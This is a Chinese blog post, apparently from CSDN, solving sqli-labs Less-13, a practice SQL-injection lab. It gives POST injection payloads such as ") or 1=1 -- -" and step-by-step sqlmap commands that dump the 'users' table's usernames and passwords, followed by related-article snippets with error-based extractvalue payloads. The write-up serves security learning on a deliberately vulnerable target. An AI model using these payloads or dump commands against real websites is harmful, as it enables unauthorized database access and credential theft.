sql二次注入-sqli-labs第13关

最新推荐文章于 2024-03-14 18:17:03 发布
最新推荐文章于 2024-03-14 18:17:03 发布
阅读量917 收藏 4
点赞数 3
分类专栏: sqli-labs系列 文章标签: sql 数据库 database
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46784800/article/details/121144086
版权

获取数据操作

判断所查询数据库中包含的列数

采用post进行参数输入:

image-20211103204742774

image-20211103204845954

image-20211103204902840

uname=') order by 3 -- - &passwd=') -- -

通过对查询结果进行排序,发现无法对第三列进行排序,且报错Unknown column ‘3’ in ‘order clause’,则说明所查询数据库中共有两列数据。

判断输出数据与数据库的联系

image-20211103205235809

输入语句 uname=') or 1=1 -- - &passwd=') -- - 可发现界面只有登录成功的提示,则说明该网站为盲注,则可利用sqlmap进行bool盲注。

爆破数据库名字

sqlmap.py -u http://sqli/Less-13/ --data "uname=1&passwd=11" --current-db

-u 后面的参数为要爆破的网站;–data 后面加入的参数为网站传入的数据,get和post的访问方式均可用–data进行传参;–current-db意思是通过枚举爆破出当前数据库的名字。

image-20211104152259255

得出当前网站使用的数据库为“security”。

爆破数据库的表名

sqlmap.py -u http://sqli/Less-13/ --data "uname=1&passwd=1" -D "security" --tables

-D后面的参数意思为,爆破的网站的数据库为“security”,–tables意思为列举当前数据库的所有表。

image-20211104152448815

得出当前数据库中的表名。

爆破表users中的列名

sqlmap.py -u http://sqli/Less-13/ --data "uname=1&passwd=1" -D "security" -T "users" --columns

-T后面参数意思为爆破的表名为“users”。

image-20211104152643520

得出“users”表中的列数,可以看见含有password和username列。

爆破users表中的password列和username列

sqlmap.py -u http://sqli/Less-13/ --data "uname=1&passwd=1" -D "security" -T "users" -C username --dump

-C后面加入的参数为要查询的列名,–dump作用为显示结果,如果不加的话,会显示不出来(我也不知道为啥=-=)

image-20211104154059858

查询出username结果。

sqlmap.py -u http://sqli/Less-13/ --data "uname=1&passwd=1" -D "security" -T "users" -C password --dump

查询password:

image-20211104153859669

查询出password结果。

学编程的小w
关注
  • 3
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
mysql注入-sqlilabs靶场注入
10-15
sqlilabs靶场全部卡的详细解析,pdf文档
sqli-lab教程 less-13,14
xiaoyuhensuai的博客
07-09 297
这一题我们需要使用burp suite。首先我们在username和password中随便输入一串数字或字母,然后进入抓包开始操作。首先我们来对数据库名进行查询: 如下图所示:可以看出数据库名为“security” 接着我们来继续查询数据库有哪些: 如下图所示: 其次来查看security数据库中所有的数据表: 如下图所示:接着我们来显示users中的字段: 如图下图所示: 查找原SQL语句:$sql="SELECT username, password FROM users WHERE
详细sqli-labs(1-65)通讲解
m0_67401134的博客
07-30 1万+
如果刚开始接触sql注入,那么sqli-labs这个靶场会很适合你,里面包含了很多的情景,以及我们在sql注入的时候遇到的阻碍。本章将1-65重点卡进行详细讲解。代码基本上很全。如果靶场练习完了可以看我这篇SQL注入总结会更好掌握。...
sqllab第十三笔记
最新发布
I_WORM的博客
03-14 298
构造payload:username=a')+or+extractvalue(1,concat(0x7e,database(),0x7e))#报错注入获取表名和字段信息以及敏感内容信息在前几就展示了;欸,又报错了,发现了更多的信息;应该是一个where username=('输入内容')构造payload:username=a')+or+exp(710)#重新构造payload:username=a')+or+1=1#构造payload:username=a')+or1=1#成功获取了数据库名;
sqli-labs第十三
yuqnqi的博客
05-09 372
第二个参数: xml中的位置是可操作的地方,xml文档中查找字符位置是用 /xxx/xxx/xxx/…这种格式,如果我们写入其他格式,就会报错,并且会返回我们写入的非法格式内容,而这个非法的内容就是我们想要查询的内容。tip: 还有要注意的地方是,它能够查询的字符串长度最大是32个字符,如果超过32位,我们就需要用函数来查询,比如right(),left(),substr()来截取字符串。构造语句,先用 ') 进行闭合,判断列数是多少,持续增加列数,直到返回正确的结果。判断注入点的闭合方式。
sqli - labs - 13 ~ 14
m0_62102000的博客
07-15 239
sqli - labs - 13 ~ 14
sqli-labs/Less-13
m0_71299382的博客
11-18 262
sqli-labs第十三
sqli-labs通(十三)
qq_65950075的博客
05-03 525
报错原理:xml文档中查找字符位置是用/xxx/xxx/xxx/...这种格式,如果写入其他格式就会报错,并且会返回写入的非法格式内容,错误信息如:XPATH syntax error:'xxxxxxxx‘没有任何的返回信息,只有报错信息,那我们就用报错注入,让返回的报错信息包含我们的想要的信息。0x7e是~的意思,用concat拼接我们的sql语句,不符合xml文档的格式,就会报错,参数2:XPath_string(Xpath格式的字符串),注入时可操作的地方。作用:改变文档中符合条件的节点的值。
SQL注入sqli-labs靶场通(1-37
qq_68163788的博客
02-03 2947
sqli-labs是一个用于学习和练习SQL注入的开源项目。它提供了一系列的实验室环境,让用户能够在不同的SQL注入场景中进行练习和测试。这些场景包括基本的SQL注入、盲注、联合查询注入等等。 sqli-labs还提供了详细的说明和解释,帮助用户理解SQL注入的原理和技术。通过这些实验和学习,用户可以更好地了解SQL注入的危害,并学会如何防范和阻止SQL注入攻击
[网络安全]sqli-labs Less-13 解题详析
等风来
07-24 2307
以上为[网络安全]sqli-labs Less-13 解题详析,后续将分享[网络安全]sqli-labs Less-14 解题详析我是秋说,我们下次见。
sqli-labs-master第13、14
m_ing
05-13 1143
前言:输入内容被放到双引号中,报错型注入,注释符不可用 第十三: http://192.168.89.134/sqli-labs-master/Less-13/ 先输入:admin’) 我们还是分析一下: 我们接着用and来测试。 admin’) and 1=2# -admin’) union selec 1,2#联合查询 还是没有报错,那我们就用报错语句来测试吧,这次我使用extractvalue() 显示版本,数据库 admin’) and extractvalue(1,concat(0x7
sqli-labs靶场实战
u011417723的博客
03-08 1692
靶场实战
jeakinscheung-sqli-labs-php7-master.zip
03-16
sqli创建数据库连接发现连接不了,这种原因是现在大部分人用的php7,原版的sqli只支持php5.
sqlilabs过手册注入天书,过sqlliabs的绝佳手册
06-28
Sqli-labs安装需要安装以下环境 apache+mysql+php Sqli-labs安装 将之前下载的源码解压到web目录下,linux的apache为 /var/www/html下,windows下的wamp解压在www目录下。 修改sql-connections/db-creds.inc文件当中...
SQL注入天书 sqli-labs
01-11
SQL注入天书 sqli-labs
PHP、Apache环境中部署sqli-labs(SQL注入靶场)
01-08
PHP、Apache环境中部署sqli-labs(SQL注入靶场)
sqli-labs通-------13lesson-post(单引号变形双注入)
枯藤闲画云
07-05 270
我们根据尝试发现有报错。以及数据应该是以单引号和括号闭合的。 尝试万能密码发现无效 然后通过bp抓包改包下面的都可以 uname=admin') and extractvalue(1,concat(0x7e,(select database()))) and (' uname=admin') and extractvalue(1,concat(0x7e,(select dat...
Sqli-labs靶场第13详解[Sqli-labs-less-13]
m0_73615178的博客
03-02 561
所以,payload分析输入一个username值然后使用单引号加小括号 ') 闭合前面的语句,然后为了使where语句条件成立,加上一个or 1=1 ,-- 注释语句使后面的语句直接注释password不用判断。整条语句使用单引号加小括号 ") 闭合。由于这题是post请求,所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件。当值为3时报错显示,所以列数为2,但是没有显示位,所以尝试报错注入。根据题目看,像一个登录页面,尝试使用布尔型盲注测试能否登录网站。
SQLi LABS Less-13 报错注入+布尔盲注
热门推荐
wangyuxiang946的博客
06-21 1万+
SQLi 第十三SQLi-LABS Less-13SQLi-LABS Less 13SQLiLABS Less13SQLi Less 13
SQL注入靶场sqli-labs
12-20
sqli-labs是一个基于SQL注入的游戏教程,它可以帮助用户更好地了解SQL注入的语法和原理。要搭建sqli-labs靶场,您可以按照以下步骤进行操作: 1. 下载sqli-labs项目:您可以从GitHub上的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

学编程的小w

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值